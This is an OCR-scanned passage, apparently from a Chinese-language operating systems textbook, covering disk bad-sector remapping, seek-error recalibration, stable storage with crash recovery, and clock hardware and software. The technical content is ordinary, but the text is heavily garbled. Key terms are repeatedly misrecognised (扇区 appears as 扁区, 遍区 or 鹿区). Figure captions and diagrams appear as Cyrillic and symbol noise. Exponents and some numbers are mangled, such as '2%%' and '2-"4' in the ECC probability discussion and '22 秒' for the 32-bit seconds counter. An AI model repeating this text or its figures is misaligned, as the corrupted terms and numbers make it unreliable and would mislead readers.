制造 时 的 瑕 症 会 引入 坏 扁 区 ,也 就 是 说 , 扇 区 不 能 正确 地 读 回 刚刚 写 到 其 上 的 值 。 如 果 瑕 症 非 常 小 ， 
比如 说 只 有 几 位 ， 那 么 使 用 坏 扁 区 并 且 每 次 只 是 让 ECC 校 正 错误 是 可 能 的 。 如 果 瑕 羔 较 大 ， 那 么 错误 就 
不 可 能 被 掩盖 。 

对 于 坏 块 存在 两 种 一 般 的 处 理 方法 : 在 控制 器 中 对 它们 进行 处 理 或 者 在 操作 系统 中 对 它们 进行 处 理 。 
在 前 一 种 方法 中 ， 磁 盘 在 从 工厂 出 厂 之 前 要 进行 测试 ， 并 且 将 一 个 坏 扇 区 列表 写 在 磁盘 上 。 对 于 每 一 个 
坏 扇 区 ， 用 一 个 备用 肩 区 替换 它 。 

有 两 种 方法 进行 这 样 的 替换 。 在 图 5-30a 中 ， 我 们 看 到 单个 磁盘 磁道 ， 它 具有 30 个 数据 扇 区 和 两 个 
备用 遍 区 。 扇 区 7 是 有 下 症 的 。 控 制 器 所 能 够 做 的 事情 是 将 备用 扇 区 之 一 重 映射 为 扁 区 7， 如 图 5-30b 所 
示 。 另 一 种 方法 是 将 所 有 扇 区 向 上 移动 一 个 扁 区 ， 如 图 5-30c 所 示 。 在 这 两 种 情况 下 ， 控 制 器 都 必须 知 
道 哪个 鹿 区 是 哪个 扁 区 。 它 可 以 通过 内 部 的 来 跟踪 这 一 信息 (每 个 磁道 一 张 表 ) ， 或 者 通过 重 写 前 导 
码 来 给 出 重 映射 的 扁 区 号 。 如 果 是 重 写 前 导 码 ， 那 么 图 5-30c 的 方法 就 要 做 更 多 的 工作 (因为 23 个 前 导 
码 必 须 重 写 )， 但 是 最 终 会 提供 更 好 的 性 能 ， 因 为 整个 磁道 仍然 可 以 在 旋转 一 周 中 读 出 。 


图 5-30 а) 具有 一 个 坏 扁 区 的 磁盘 磁道 ，b) 用 备用 扁 区 赫 换 坏 扁 区 ，c) 移动 所 有 扇 区 以 回避 坏 扁 区 


驱动 器 安装 之 后 在 正常 工作 期 间 也 会 出 现 错误 。 在 遇 到 ECC 不 能 处 理 的 错误 时 ， 第 一 道 防线 只 是 试 
图 再 次 读 。 某 些 读 错误 是 瞬时 性 的 ， 也 就 是 说 是 由 磁头 下 的 灰尘 导致 的 ， 在 第 二 次 尝试 时 错误 就 消失 了 。 
如 果 控制 器 注意 到 它 在 某 个 扇 区 遇 到 重复 性 的 错误 ， 那么 可 以 在 该 扇 区 完全 死 掉 之 前 切换 到 一 个 备用 扇 
区 。 这 样 就 不 会 丢失 数据 并 且 操 作 系统 和 用 户 甚至 都 不 会 注意 到 这 一 问题 。 通常 使 用 的 是 图 5-30b 的 方法 ， 
因为 其 他 扁 区 此 刻 可 能 包含 数据 。 而 使 用 图 5-30c 的 方法 则 不 但 要 重 写 前 导 码 ， 还 要 复制 所 有 的 数据 。 

前 面 我 们 曾 说 过 存在 两 种 一 般 的 处 理 错误 的 方法 在 控制 器 中 或 者 在 操作 系统 中 处 理 错误 。 如 果 控 
制 器 不 具有 像 我 们 已 经 讨论 过 的 那样 透明 地 重 映射 扇 区 的 能 力 ， 那么 操作 系统 必须 在 软件 中 做 同样 的 事 
情 。 这 意味 着 操作 系统 必须 首先 获得 一 个 坏 遍 区 列表 ， 或 者 是 通过 从 磁盘 中 读 出 该 列表 ， 或 者 只 是 由 它 
自己 测试 整个 磁盘 。 一 旦 操作 系统 知道 哪些 扁 区 是 坏 的 ， 它 就 可 以 建立 重 映射 表 。 如 果 操 作 系统 想 使 用 
图 5-30c 的 方法 ， 它 就 必须 将 扇 区 7 到 遍 区 29 中 的 数据 向 上 移动 一 个 扁 区 。 

如 果 由 操作 系统 处 理 重 上 映射 ， 那 么 它 必须 确保 坏 扇 区 不 出 现在 任何 文件 中 ， 并 且 不 出 现在 空闲 列表 
或 位 图 中 。 做 到 这 一 点 的 一 种 方法 是 创建 一 个 包含 所 有 坏 扇 区 的 秘密 的 文件 。 如 果 该 文件 不 被 加 入 文件 
系统 ， 用 户 就 不 会 意外 地 读 到 它 (或 者 更 粳 粒 地 ， 释 放 它 ) 。 

然而 ， 还 存在 另 一 个 问题 备份。 如 果 磁 盘 是 一 个 文件 一 个 文件 地 做 备份 ， 那么 非常 重要 的 是 备份 
实用 程序 不 去 尝试 复制 坏 块 文件 。 为 了 防止 发 生 这 样 的 事情 ， 操作 系统 必须 很 好 地 隐藏 坏 块 文件 ， 以 至 
于 备份 实用 程序 也 不 能 发 现 它 。 如 果 磁 盘 是 一 个 扇 区 一 个 扇 区 地 做 备份 而 不 是 一 个 文件 一 个 文件 地 做 备 
份 ， 那 么 在 备份 期 间 防 止 读 错误 是 十 分 困难 的 ， 如 果 不 是 不 可 能 的 话 。 惟一 的 希望 是 备份 程序 具有 足够 
的 智能 ， 在 读 失败 10 次 后 放弃 并 且 继 续 下 一 个 扇 区 。 

坏 扁 区 不 是 惟一 的 错误 来 源 ， 也 可 能 发 生 磁 盘 禹 中 的 机 械 故 障 引起 的 寻 首 错误。 控制 器 内 部 跟踪 着 
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大 多 数 硬盘 控制 器 可 以 自动 纠正 寻 道 错误 ,但 是 大 多 数 软盘 控制 器 (包括 Pentium 的 ) 只 是 设置 一 
个 错误 标志 位 而 把 余下 的 工作 留 给 驱动 程序 。 驱 动 程序 对 这 一 错误 的 处 理 办 法 是 发 出 一 个 recalibrate 
(重新 校准 ) 命令 ， 让 磁盘 臂 尽 可 能 地 向 最 外 面 移动 ， 并 将 控制 器 内 部 的 当前 柱 面 重 置 为 0。 通 常 这 样 就 
可 以 解决 问题 了。 如 果 还 不 行 ， 则 只 好 修理 驱动 器 。 

正如 我 们 已 经 看 到 的 ， 控 制 器 实际 是 一 个 专用 的 小 计算 机 ， 它 有 软件 、 变 量 、 缓 冲 区 ， 偶 尔 还 出 现 
故障 。 有 时 一 个 不 寻常 的 事件 序列 ， 例 如 一 个 驱动 器 发 生 中 断 的 同时 另 一 个 驱动 器 发 出 recalibrate 命 令 ， 
就 可 能 引发 一 个 故障 ， 导 致 控制 器 陷入 一 个 循环 或 失去 对 正在 做 的 工作 的 跟踪 。 控 制 器 的 设计 者 通常 考 
虑 到 最 坏 的 情形 ， 在 芯片 上 提供 了 一 个 引 脚 ， 当 该 引 脚 被 置 起 时 ， 迫 使 控制 器 忘记 它 正在 做 的 任何 事情 
并 且 将 其 自身 复位 。 如 果 其 他 方法 都 失败 了 ， 磁 盘 驱 动 程序 可 以 设置 一 个 控制 位 以 触发 该 信号 ， 将 控制 
器 复位 。 如 果 还 不 成 功 ， 驱 动 程序 所 能 做 的 就 是 打印 一 条 消息 并 且 放 弃 。 

重新 校准 一 块 磁盘 会 发 出 古怪 的 噪音 ， 但 是 正常 工作 时 并 不 让 人 烦 扰 。 然 而 ， 存 在 这 样 一 种 情形 ， 
对 于 具有 实时 约束 的 系统 而 言 重新 校准 是 一 个 严重 的 问题 。 当 从 硬盘 播放 视频 时 ， 或 者 当 将 文件 从 硬盘 
烧 录 到 CD-ROM 上 时 ， 来 自 硬盘 的 位 流 以 均匀 的 速率 到 达 是 必需 的 。 在 这 样 的 情况 下 ， 重 新 校准 会 在 位 
流 中 插入 间隙 ， 因 此 是 不 可 接受 的 。 称 为 AV 盘 (Audio Visual disk， 音 视盘 ) 的 特殊 驱动 器 永远 不 会 重 
新 校准 ， 因 而 可 用 于 这 样 的 应 用 。 


5.4.5 稳定 存储 器 

正如 我 们 已 经 看 到 的 ， 磁 盘 有 时 会 出 现 错误 。 好 扁 区 可 能 突然 变 成 坏 扁 区 ， 整 个 驱动 器 也 可 能 出 乎 
意料 地 死 掉 。RAID 可 以 对 几 个 扇 区 出 错 或 者 整个 驱动 器 崩溃 提供 保护 。 然 而 ，RAID 首 先 不 能 对 将 坏 数 
据 写 下 的 写 错误 提供 保护 ， 并 且 也 不 能 对 写 操作 期 间 的 崩溃 提供 保护 ， 这 样 就 会 破坏 原始 数据 而 不 能 以 
更 新 的 数据 替换 它们 。 

对 于 某 些 应 用 而 言 ， 决 不 丢失 或 破坏 数据 是 绝对 必要 的 ， 即 使 面临 磁盘 和 CPU 错误 也 是 如 此 。 理 想 
的 情况 是 ， 磁 盘 应 该 始终 没有 错误 地 工作 。 但 是 ， 这 是 做 不 到 的 。 所 能 够 做 到 的 是 ， 一 个 磁盘 子 系统 具 
有 如 下 特性 : 当 一 个 写 命令 发 给 它 时 ， 磁 盘 要 么 正确 地 写 数据 ， 要 么 什么 也 不 做 ， 让 现 有 的 数据 完整 无 
缺 地 留 下 。 这 样 的 系统 称 为 稳定 存储 器 (stable storage) ， 并 且 是 在 软件 中 实现 的 【Lampson 和 Sturgis， 
1979)。 目 标 是 不 惜 一 切 代价 保持 磁盘 的 一 致 性 。 下 面 我 们 将 描述 这 种 最 初 思想 的 一 个 微小 的 变 体 。 

在 描述 算法 之 前 ， 重 要 的 是 对 于 可 能 发 生 的 错误 有 一 个 清晰 的 模型 。 该 模型 假设 在 磁盘 写 一 个 块 
(一 个 或 多 个 遍 区 ) 时 ， 写 操作 要 么 是 正确 的 ， 要么 是 错误 的 ， 并 且 该 错误 可 以 在 随后 的 读 操作 中 通过 
检查 ECC 域 的 值 检测 出 来 。 原 则 上 ， 保 证 错误 检测 是 根本 不 可 能 的 ， 这 是 因为 ， 假 如 使 用 一 个 16 字 节 的 
ECC 域 保护 一 个 512 字 节 的 扇 区 ， 那 么 存在 着 2%% 个 数据 值 而 仅 有 2:# 个 ECC 值 。 因 此 ， 如 果 一 个 块 在 写 
操作 期 间 出 现 错误 但 是 ECC 没 有 出 错 ， 那 么 存在 着 几 亿 亿 个 错误 的 组 合 可 以 产生 相同 的 ECC。 如 果 某 些 
这 样 的 错误 出 现 ， 则 错误 不 会 被 检测 到 。 大 体 上 ， 随 机 数据 具有 正确 的 16 字 节 ECC 的 概率 大 约 是 2-"4。 
该 概率 值 足 够 小 以 至 于 我 们 可 以 视 其 为 零 ， 尽 管 它 实际 上 并 不 为 零 。 

该 模型 还 假设 一 个 被 正确 写 人 的 扁 区 可 能 会 自发 地 变 坏 并 且 变 得 不 可 读 。 然 而 ， 该 假设 是 ;这样 的 
事件 非常 少见 ， 以 至 于 在 合理 的 时 间 间 隔 内 (例如 1 天 ) 让 相同 的 扁 区 在 第 二 个 (独立 的 ) 驱动 器 上 变 
坏 的 概率 小 到 可 以 忽略 的 程度 。 

该 模型 还 假设 CPU 可 能 出 故障 ， 在 这 样 的 情况 下 只 能 停机 。 在 出 现 故障 的 时 刻 任何 处 于 进行 中 的 磁 
盘 写 操作 也 会 停止 ， 导 致 不 正确 的 数据 写 在 一 个 扇 区 中 并 且 后 来 可 能 会 检测 到 不 正确 的 ECC。 在 所 有 这 
些 情况 下 ， 稳 定 存储 器 就 写 操作 而 言 可 以 提供 100% 的 可 靠 性 ， 要 么 就 正确 地 工作 ， 要 么 就 让 旧 的 数据 
原封 不 动 。 当 然 ， 它 不 能 对 物理 灾难 提供 保护 ， 例 如 ， 发 生地 震 ， 计 算 机 跌落 100m 掉 入 一 个 裂 颖 并 且 
陷入 沸腾 的 岩浆 池 中 ， 在 这 样 的 情况 下 用 软件 将 其 恢复 是 勉 为 其 难 的 。 

稳定 存储 器 使 用 一 对 完全 相同 的 磁盘 , 对 应 的 块 一 同 工 作 以 形成 一 个 无 差错 的 块 。 当 不 存在 错误 时 ， 
在 两 个 驱动 器 上 对 应 的 块 是 相同 的 ， 读 取 任意 一 个 都 可 以 得 到 相同 的 结果 。 为 了 达到 这 一 目的 ， 定 义 了 
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下 述 三 种 操作 : 

1) #45 (stable write)。 稳 定 写 首先 将 块 写 到 驱动 器 1 上 ， 然 后 将 其 读 回 以 校 验 写 的 是 正确 的 。 如 
果 写 的 不 正确 ， 那 么 就 再 次 做 写 和 重读 操作 ， 一 直到 次， 直到 正常 为 止 。 经 过 n 次 连续 的 失败 之 后 ， 就 
将 该 块 重 映 射 到 一 个 备用 块 上 ， 并 且 重 复写 和 重读 操作 直到 成 功 为 止 ， 无 论 要 尝试 多 少 个 备用 块 。 在 对 
驱动 器 1 的 写成 功 之 后 ， 对 驱动 器 2 上 对 应 的 块 进行 写 和 重读 ， 如 果 需 要 的 话 就 重复 这 样 的 操作 ， 直 到 最 
后 成 功 为 止 。 如 果 不 存在 CPU 崩溃 ， 那 么 当 稳定 写 完成 后 ， 块 就 正确 地 被 写 到 两 个 驱动 器 上 ， 并 且 在 两 
个 驱动 器 上 得 到 校 验 。 

2) 稳定 读 (stable read)。 稳 定 读 首先 从 驱动 器 I 上 读 取 块 。 如 果 这 一 操作 产生 错误 的 ECC， 则 再 次 
尝试 读 操 作 ， 一 直到 nm 次。 如 果 所 有 这 些 操 作 都 给 出 错误 的 ECC， 则 从 驱动 器 2 上 读 取 对 应 的 数据 块 。 给 
定 一 个 成 功 的 稳定 写 为 数据 块 留 下 两 个 可 靠 的 副本 这 样 的 事实 ， 并 且 我 们 假设 在 合理 的 时 间 间 隔 内 相同 
的 块 在 两 个 驱动 器 上 自发 地 变 坏 的 概率 可 以 忽略 不 计 ， 那 么 稳定 读 就 总 是 成 功 的 

3) 崩溃 恢复 (crash recovery)。 崩 溃 之 后 ,恢复 程序 扫描 两 个 磁盘 ， 比 较 对 应 的 块 。 如 果 一 对 块 都 
是 好 的 并 且 是 相同 的 ， 就 什么 都 不 做 。 如 果 其 中 一 个 具有 ECC 错 误 ， 那 么 坏 块 就 用 对 应 的 好 块 来 覆盖 。 
如 果 一 对 块 都 是 好 的 但 是 不 相同 ， 那 么 就 将 驱动 器 1 上 的 块 写 到 驱动 器 2 上 。 

如 果 不 存在 CPU 崩溃 ， 那 么 这 一 方法 总 是 可 行 的 ， 因 为 稳定 写 总 是 对 每 个 块 写 下 两 个 有 效 的 副本 ， 
并 且 假 设 自发 的 错误 决 不 会 在 相同 的 时 刻 发 生 在 两 个 对 应 的 块 上 。 如 果 在 稳定 写 期 间 出 现 CPU 崩 溃 会 怎 
么 样 ? 这 就 取决 于 崩溃 发 生 的 精确 时 间 。 有 5 种 可 能 性 ， 如 图 5-31 所 示 。 

ECC 
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图 5-31 ЖАНРЕ ЫН Т. 


在 图 5-31a 中 ，CPU 崩 溃 发 生 在 写 块 的 两 个 副本 之 前 。 在 恢复 的 时 候 ， 什 么 都 不 用 修改 而 旧 的 值 将 
继续 存在 ， 这 是 允许 的 。 

在 图 5-3lb 中 ，CPU 崩 溃 发 生 在 写 驱动 器 1 期间， 破坏 了 该 块 的 内 容 。 然 而 恢复 程序 能 够 检测 出 这 一 
错误 ， 并 且 从 驱动 器 2 恢复 驱动 器 1 上 的 块 。 因 此 ， 这 一 崩溃 的 影响 被 消除 并 且 旧 的 状态 完全 被 恢复 。 

在 图 5-31c 中 ，CPU 崩 证 发 生 在 写 完 驱 动 器 1 之 后 但 是 还 没有 写 驱 动 器 2 之 前 。 此 时 已 经 过 了 无 法 复 
原 的 时 刻 : 恢复 程序 将 块 从 驱动 器 1 复制 到 驱动 器 2 上 。 写 是 成 功 的 。 

图 5-31d 与 图 5-31b 相 类 似 : 在 恢复 期 间 用 好 的 块 覆盖 坏 的 块 。 不 同 的 是 ， 两 个 块 的 最 终 取 值 都 是 新 的 。 

最 后 ， 在 图 5-31e 中 ， 恢 复 程序 看 到 两 个 块 是 相同 的 ， 所 以 什么 都 不 用 修改 并 且 在 此 处 写 也 是 成 功 的 。 

对 于 这 一 模式 进行 各 种 各 样 的 优化 和 改进 都 是 可 能 的 。 首 先 ， 在 崩溃 之 后 对 所 有 的 块 两 个 两 个 地 进 
行 比较 是 可 行 的 ， 但 是 代价 高 郧 。 一 个 巨大 的 改进 是 在 稳定 写 期 间 跟踪 被 写 的 是 哪个 块 ， 这 样 在 恢复 的 
时 候 必 须 被 检验 的 块 就 只 有 一 个 。 某 些 计算 机 拥有 少量 的 非 易 失 性 RAM (nonvolatile RAM) ， 它 是 一 个 
特殊 的 CMOS 存 储 器 ， 由 锂电 池 供 电 。 这 样 的 电池 能 够 维持 很 多 年 ， 甚 至 有 可 能 是 计算 机 的 整个 生命 周 
期 。 与 主 存 不 同 〈 它 在 崩溃 之 后 就 丢失 了 ) ， 非 易 失 性 RAM 在 崩溃 之 后 并 不 丢失 。 每 天 的 时 间 通 常 就 保 
存在 这 里 (并 且 通 过 一 个 特殊 的 电路 进行 增值 )， 这 就 是 为 什么 计算 机 即使 在 拔 掉 电 源 之 后 仍然 知道 是 
什么 时 间 。 

假设 非 易 失 性 RAM 的 几 个 字 节 可 供 操作 系统 使 用 ， 稳 定 写 就 可 以 在 开始 写 之 前 将 准备 要 更 新 的 块 
的 编号 放 到 非 易 失 性 RAM 里 。 在 成 功 地 完成 稳定 写 之 后 ， 在 非 易 失 性 RAM 中 的 块 编号 用 一 个 无 效 的 块 
编号 (例如 -1) 巴 盖 掉 。 在 这 些 情形 下 ， 岗 溃 之 后 恢复 程序 可 以 检验 非 易 失 性 RAM 以 了 解 在 崩溃 期 间 
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是 否 有 一 个 稳定 写 正在 进行 中 ， 如 果 是 的 话 ， 还 可 以 了 解 在 出 渍 发 生 的 时 候 被 写 的 是 哪 一 个 块 。 然 后 ， 
可 以 对 块 的 两 个 副本 进行 正确 性 和 一 致 性 检验 。 

如 果 没 有 非 易 失 性 RAM 可 用 ， 可 以 对 它 模拟 如 下 。 在 稳定 写 开始 时 ， 用 将 要 被 稳定 写 的 块 的 编号 
覆盖 驱动 器 ! 上 的 一 个 固定 的 块 ， 然 后 读 回 该 块 以 对 其 进行 校 验 。 在 使 得 该 块 正确 之 后 ， 对 驱动 器 2 上 对 
应 的 块 进行 写 和 校 验 。 当 稳定 写 正确 地 完成 时 ， 用 一 个 无 效 的 块 编号 覆盖 两 个 块 并 进行 校 验 。 这 样 一 来 ， 
崩溃 之 后 就 很 容易 确定 在 崩溃 期 间 是 否 有 一 个 稳定 写 正在 进行 中 。 当 然 ， 这 一 技术 为 了 写 一 个 稳定 的 块 
需要 8 次 额外 的 磁盘 操作 ， 所 以 应 该 极 少量 地 应 用 该 技术 。 

还 有 最 后 一 点 值得 讨论 。 我 们 假设 每 天 每 一 对 块 只 发 生 一 个 好 块 自发 损坏 成 为 坏 块 。 如 果 经 过 足够 
长 的 时 间 ， 另 一 个 块 也 可 能 变 坏 。 因 此 ， 为 了 修复 任何 损害 每 天 必须 对 两 块 磁盘 进行 一 次 完整 的 扫描 。 
这 样 ， 每 天 早晨 两 块 磁盘 总 是 一 模 一 样 的 。 即 便 在 一 个 时 期 内 一 对 中 的 两 个 块 都 坏 了 ， 所 有 的 错误 也 都 
能 正确 地 修复 。 


5.5 时 钟 

时 钟 (clock) 又 称 为 定时 器 (timer)， 由 于 各 种 各 样 的 原因 决定 了 它 对 于 任何 多 道 程序 设计 系统 的 
操作 都 是 至 关 重 要 的 。 时 钟 负责 维护 时 间 ， 并 且 防 目 一 个 进程 芍 断 CPU， 此 外 还 有 其 他 的 功能 。 时 钟 软 
件 可 以 采用 设备 驱动 程序 的 形式 ， 尽 管 时钟 既 不 像 磁盘 那样 是 一 个 块 设备 ， 也 不 像 鼠 标 那样 是 一 个 字符 
设备 。 我 们 对 时 钟 的 研究 将 遵循 与 前 面 几 节 相同 的 模式 : 首先 考虑 时 钟 硬件 ， 然 后 考虑 时 钟 软件 。 


5.5.1 时 钟 硬件 

在 计算 机 里 通常 使 用 两 种 类 型 的 时 钟 , 这 两 种 类 型 的 时 钟 与 人 们 使 用 的 钟表 和 手表 有 相当 大 的 差异 。 
比较 简单 的 时 钟 被 连接 到 110V 或 220V 的 电源 线 上 ， 这 样 每 个 电压 周期 产生 一 个 中 断 ， 频 率 是 50Hz 或 
60Hz。 这 些 时 钟 过 去 曾经 占据 统治 地 位 ， 但 是 如 今 却 非常 罕见 。 

另 一 种 类 型 的 时 钟 由 三 个 部 件 构成 :晶体 振荡 器 、 计 数 器 和 存储 寄存 器 ， 如 图 5-32 所 示 。 当 把 一 块 


石英 晶体 适当 地 切割 并 且 安 装 在 一 定 的 压力 之 晶体 振东 器 

下 时 ， 它 就 可 以 产生 非常 精确 的 周期 性 信号 ， 40 

АЛУА ТЕЛ. а, JERR 

与 所 选 的 晶体 有 关 。 使 用 电子 器 件 可 以 将 这 一 нива 
ЖН Ө IR LA — AN Уй; Ж Ж ж КОБ ҮТҮ 


1000MHz 其 至 更 高 的 频率 。 在 任何 一 台 计 算 机 


里 通常 都 可 以 找到 至 少 一 个 这 样 的 电路 ， 它 给 
计算 机 的 各 种 电路 提供 同步 信号 。 该 信号 被 送 。[ [TT 了 TTTTTTTTTTT] анан 
энин, вхамнио, чина ало ет 

可 编程 时 钟 通常 具有 几 种 操作 模式 。 在 一 痰 完成 模式 《one-shot mode) 下 ， 当 时 钟 启动 时 ， 它 把 存 
储 寄 存 器 的 值 复制 到 计数 器 中 ， 然 后 ， 来 自 晶体 的 每 一 个 防 冲 使 计数 器 减 1。 当 计数 器 变 为 0 时 ”产生 一 
个 中 断 ， 并 停止 工作 ， 直 到 软件 再 一 次 显 式 地 启动 它 。 在 方 泪 模式 (square-wave mode) 下 ， 当 计数 器 
变 为 0 并 且 产生 中 上 断 之 后 ， 存 储 寄存 器 的 值 自动 复制 到 计数 器 中 ， 并 且 整 个 过 程 无 限期 地 再 次 重复 下 去 。 
这 些 周期 性 的 中 断 称 为 时 钟 滴答 (clock tick), 

可 编程 时 钾 的 优点 是 其 中 电 频 率 可 以 由 软件 控制 。 如 果 采 用 500MHz 的 晶体 ， 那 么 计数 器 将 每 隔 2ns 
脉动 一 次 。 对 于 (无 符号 ) 32 位 寄存 器 ， 中 断 可 以 被 编程 为 从 2ns 时 间 间隔 发 生 一 次 到 8 .6s 时 间 间隔 发 生 
一 次 。 可 编程 时 钟 艺 片 通常 包含 两 个 或 三 个 独立 的 可 编程 时 钟 ， 并 且 还 具有 许多 其 他 选项 例如， 用 下 
计时 代替 倒计时 、 屏 项 中 上 断 等 )。 

为 了 防止 计算 机 的 电源 被 切断 时 丢失 当前 时 间 ， 大 多 数 计算 机 具有 一 个 由 电池 供电 的 备份 时 钟 ， 它 
是 由 在 数字 手表 中 使 用 的 那 种 类 型 的 低 功 耗 电路 实现 的 。 电 池 时 名 可 以 在 系统 启动 的 时 候 读 出 。 如 果 不 
存在 备份 时 钟 ， 软 件 可 能 会 向 用 户 询问 当前 日 期 和 时 间 。 对 于 一 个 连 人 网 络 的 系统 而 言 还 有 一 种 从 远程 
主机 获取 当前 时 间 的 标准 方法 。 无 论 是 哪 种 情况 ， 当 前 时 间 都 要 像 UNIX 所 做 的 那样 转换 成 自 1970 年 1 月 
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1 日 上 午 12 时 UTC (Universal Time Coordinated， 协 调 世界 时 ， 以 前 称 为 格林 威 治平 均 时 ) 以 来 的 时 钟 
滴答 数 ， 或 者 转换 成 自 某 个 其 他 标准 时 间 以 来 的 时 钟 滴答 数 。Windows 的 时 间 原 点 是 1980 年 1 月 1 日 。 每 
一 次 时 钟 滴答 都 使 实际 时 间 增加 一 个 计数 。 通 常会 提供 实用 程序 来 手工 设置 系统 时 钟 和 备份 时 钟 ， 并 且 
使 两 个 时 钟 保持 同步 。 

5.5.2 时 钟 软 件 

时 钟 硬件 所 做 的 全 部 工作 是 根据 已 知 的 时 间 间 隔 产 生 中 断 。 涉 及 时 间 的 其 他 所 有 工作 都 必须 由 软件 一 一 
时 钟 驱动 程序 完成 。 时 钟 驱动 程序 的 确切 任务 因 操 作 系统 而 异 ， 但 通常 包括 下 面 的 大 多 数 任务 ， 

1) 维护 日 时 间 。 

2) 防止 进程 超时 运行 。 

3) 对 CPU 的 使 用 情况 记 账 。 

4) 处 理 用 户 进程 提出 的 alarm 系 统 调用 。 

5) 为 系统 本 身 的 各 个 部 分 提供 监视 定时 器 。 

б) 完成 概要 剖析 、 监 视 和 统计 信息 收集 。 

时 钟 的 第 一 个 功能 是 维持 正确 的 日 时 间 ， 也 称 为 实际 时 间 (real time) ， 这 并 不 难 实现 ， 只 需要 如 
前 面 提 到 的 那样 在 每 个 时 钟 滴答 将 计数 器 加 1 即 可 。 惟 一 要 当心 的 事情 是 日 时 间 计 数 器 的 位 数 ， 对 于 一 
个 频率 为 60Hz 的 时 钟 来 说 ，32 位 的 计数 器 仅仅 超过 2 年 就 会 溢出 。 很 显然 ， 系 统 不 可 能 在 32 位 中 按照 自 
1970 年 ] 月 ! 日 以 来 的 时 钟 滴答 数 来 保存 实际 时 间 。 

可 以 采取 三 种 方法 来 解决 这 一 问题 。 第 一 种 方法 是 使 用 一 个 64 位 的 计数 器 ， 但 这 样 做 使 维护 计数 器 
的 代价 很 高 ， 因 为 1 秒 内 需要 做 很 多 次 维护 计数 器 的 工作 。 第 二 种 方法 是 以 秒 为 单位 维护 日 时 间 ， 而 不 
是 以 时 钟 滴答 为 单位 ， 该 方法 使 用 一 个 辅助 计数 器 来 对 时 钟 滴答 计数 ， 直 到 累计 完整 的 一 秒 。 因 为 22 秒 
超过 了 136 年 ， 所 以 该 方法 可 以 工作 到 22 世 纪 。 

第 三 种 方法 是 对 时 钟 滴答 计数 ， 但 是 这 一 计数 工作 是 相对 于 系统 引导 的 时 间 ， 而 不 是 相对 于 -个 固 
定 的 外 部 时 间 。 当 读 人 备份 时 钟 或 者 用 户 输入 实际 时 间 时 ， 系 统 引导 时 间 就 从 当前 日 时 间 开始 计算 ， 并 
且 以 任何 方便 的 形式 存放 在 内 存 中 。 以 后 ， 当 请 求 日 时 间 时 ， 存 储 的 日 时 间 值 加 到 计数 器 上 就 可 以 得 到 
当前 的 日 时 间 。 所 有 这 三 种 方法 如 图 5-33 所 示 。 

РЕ 64 位 -| 上 ~ 一 32 位 -一 32 位 一 ~ 
以 时 名 滴答 为 单位 的 日 时 间 2 [Г] р; ] 
以 秒 为 单位 “在 当前 一 秒 内 以 时 钟 滴答 


的 日 时 间 的 时 钟 滴答 数 “为 单位 计数 -一 一 一 
以 秒 为 单位 的 系 
统 引 导 时 间 
а) b) © 


图 5-33 维护 日 时 间 的 三 种 方法 


时 钟 的 第 二 个 功能 是 防止 进程 超时 运行 。 每 当 启动 一 个 进程 时 ， 调 度 程序 就 将 一 个 计数 器 初始 化 为 
以 时 钟 泣 答 为 单位 的 该 进程 时 间 片 的 取 值 。 每 次 时 钟 中 断 时 ， 时 钟 驱动 程序 将 时 间 片 计数 器 碱 1。 当 计 
数 器 变 为 0 时 ， 时 钟 驱动 程序 调用 调度 程序 以 激活 另 一 个 进程 。 

时 钟 的 第 三 个 功能 是 CPU 记 账 。 最 精确 的 记 账 方法 是 ， 每 当 一 个 进程 启动 时 ， 便 启动 一 个 不 同 于 主 
系统 定时 器 的 辅助 定时 器 。 当 进程 终止 时 ， 读 出 这 个 定时 器 的 值 就 可 以 知道 该 进程 运行 了 多 长 时 间 。 为 
了 正确 地 记 账 ， 当 中 断 发 生 时 应 该 将 辅助 定时 器 保存 起 来 ， 中 断 结束 后 再 将 其 恢复 。 

一 个 不 太 精确 但 更 加 简单 的 记 账 方法 是 在 一 个 全 局 变量 中 维护 一 个 指针 ， 该 指针 指向 进程 表 中 当前 
运行 的 进程 的 表 项 。 在 每 一 个 时 钟 滴答 ， 使 当前 进程 的 表 项 中 的 一 个 域 加 1。 通 过 这 一 方法 ， 每 个 时 钟 
涌 答 由 在 该 滴答 时 刻 运行 的 进程 “付费 "。 这 一 策略 的 一 个 小 问题 是 ， 如 果 在 一 个 进程 运行 过 程 中 多 次 
发 生 中 断 ， 即 使 该 进程 没有 做 多 少 工作 ， 它 仍然 要 为 整个 滴答 付费 。 由 于 在 中 断 期 间 恰 当地 对 CPU 进行 
记 账 的 方法 代价 过 于 昂贵 ， 因 此 很 少 使 用 。 
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在 许多 系统 中 ， 进 程 可 以 请 求 操作 系统 在 一 定 的 时 间 间 隔 之 后 向 它 报警 。 警 报 通 常 是 信号 、 中 断 、 
消息 或 者 类 亿 的 东西。 需要 这 类 报警 的 一 个 应 用 是 网 络 , 当 一 个 数据 包 在 一 定时 间 间 隔 之 内 没有 被 确认 时 ， 
该 数据 包 必须 重 发 。 另 一 个 应 用 是 计算 机 辅助 教学 ， 如 果 学 生 在 一 定时 间 内 没有 响应 ， 就 告诉 他 答案 。 

如 果 时 名 驱动 程序 拥有 足够 的 时 钟 ， 它 就 可 以 为 每 个 请 求 设置 一 个 单独 的 时 钟 。 如 果 不 是 这 样 的 情 
况 ， 它 就 必须 用 一 个 物理 时 钟 来 模拟 多 个 虚拟 时 钟 。 一 种 方法 是 维护 一 张 表 ， 将 所 有 未 完成 的 定时 器 的 
信号 时 刻 记 入 表 中 ， 还 要 维护 一 个 变量 给 出 下 一 个 信号 的 时 刻 。 每 当日 时 间 更 新 时 ， 时 钟 驱动 程序 进行 
检查 以 了 解 最 近 的 信号 是 否 已 经 发 生 。 如 果 是 的 话 ， 则 在 表 中 搜索 下 一 个 要 发 生 的 信号 的 时 刻 。 

如 果 预期 有 许多 信号 ， 那 么 通过 在 一 个 链表 中 把 所 有 未 完成 的 时 钟 请 求 按时 间 排序 链接 在 一 起 ， 这 
样 来 模拟 多 个 时 钟 则 更 为 有 效 ， 如 图 5-34 所 示 。 
链表 中 的 每 个 表 项 指出 在 前 一 个 信号 之 后 等 竺 Gl lke Re a 
多 少时 名 滴答 引发 下 一 个 信号 .在 本 例 中 ,等 [Hm | Сею] [э] 
待 处 理 的 信号 对 应 的 时 钟 滴答 分 别 是 4203 、 


4207、4213、4215 和 4216。 

在 图 5-34 中 ， 经 过 3 个 时 钟 滴答 发 生 下 一 个 Ds Re E 1x 
中 断 。 每 一 次 滴答 时 ， 下 一 个 信号 减 1， 当 它 变 图 5-34 用 单个 时 钟 模拟 多 个 定时 器 
